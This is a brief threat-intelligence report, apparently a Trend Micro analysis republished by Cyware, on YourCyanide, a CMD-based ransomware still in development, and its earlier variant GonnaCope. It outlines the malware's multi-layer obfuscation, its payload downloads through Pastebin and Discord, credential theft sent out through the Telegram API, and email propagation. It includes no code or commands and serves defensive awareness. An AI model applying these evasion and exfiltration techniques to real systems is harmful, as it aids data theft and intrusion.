Go to listing page

YourCyanide: Latest CMD-Based Ransomware with Advanced Capabilities

YourCyanide: Latest CMD-Based Ransomware with Advanced Capabilities
Trend Micro has been analyzing various CMD-based ransomware variants with sophisticated features. YourCyanide is the latest among these variants, which started with GonnaCope. 

Diving into details

  • YourCyanide integrates Pastebin, Microsoft documents, and Discord links as part of its payload download mechanism.
  • With multiple obfuscation layers, the ransomware leverages custom environment variables, as well as the Enable Delayed Expansion function, to evade detection.
  • It, furthermore, passes through various files, downloads succeeding files via Pastebin and Discord, and ultimately downloads the final payload - to hide its activities.
  • As the ransomware is still under active development, it doesn’t encrypt anything.
  • It uses the Telegram chatbot API to pilfer information and sets it to a variable ‘webhook’.

Why this matters

  • While no encryption is performed, YourCyanide renames files; thus, inconveniencing users.
  • Moreover, as this ransomware is still being developed, the developers are finalizing the encryption routine.
  • It can propagate via email to different drives.

Variant comparison

  • The earliest version of YourCyanide, dubbed GonnaCope, was first spotted in April.
  • One prominent difference between the two variants is that GonnaCope does not assimilate user credentials from a list of applications and web browsers and does not enable RDP connections.
  • In addition to the above, the earliest version doesn’t execute black.bat - the file responsible for making the machine temporarily inaccessible while the payload is executed.

The bottom line

CMD-based ransomware strains are using heavily obfuscated scripts, resulting in low detection rates. While the technique is not new, the use of multi-layered obfuscation mechanisms enables the malware to hide easily. Ransomware strains with advanced capabilities are gaining popularity among cybercriminals. While YourCyanide has not emerged as a serious threat yet, further developments need to be tracked and blocked before causing any severe repercussions.
Cyware Publisher